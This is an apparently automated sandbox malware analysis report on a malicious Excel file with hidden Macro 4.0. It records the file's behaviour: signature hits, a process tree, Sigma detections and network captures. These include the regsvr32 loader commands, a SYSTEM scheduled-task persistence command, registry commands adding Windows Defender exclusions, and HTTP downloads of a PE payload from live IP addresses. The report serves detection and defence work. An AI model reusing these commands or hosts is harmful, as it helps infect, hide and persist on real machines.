Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Claim-680517779-09242021.xls

Overview

General Information

Sample Name:Claim-680517779-09242021.xls
Analysis ID:489833
MD5:a5e00f88df7d7fc328f759cd99bcd3a0
SHA1:b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
SHA256:a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1180 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1912 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1760 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2604 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2428 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1724 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 236 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 804 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 152 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2960 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2536 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 1256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2932 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2788 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2320 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2940 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Claim-680517779-09242021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1180, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 1912
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1912, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 1760

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2520, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, ProcessId: 2604

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,4_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,6_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,14_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44463.6668827546[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:28 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:32 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:50 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
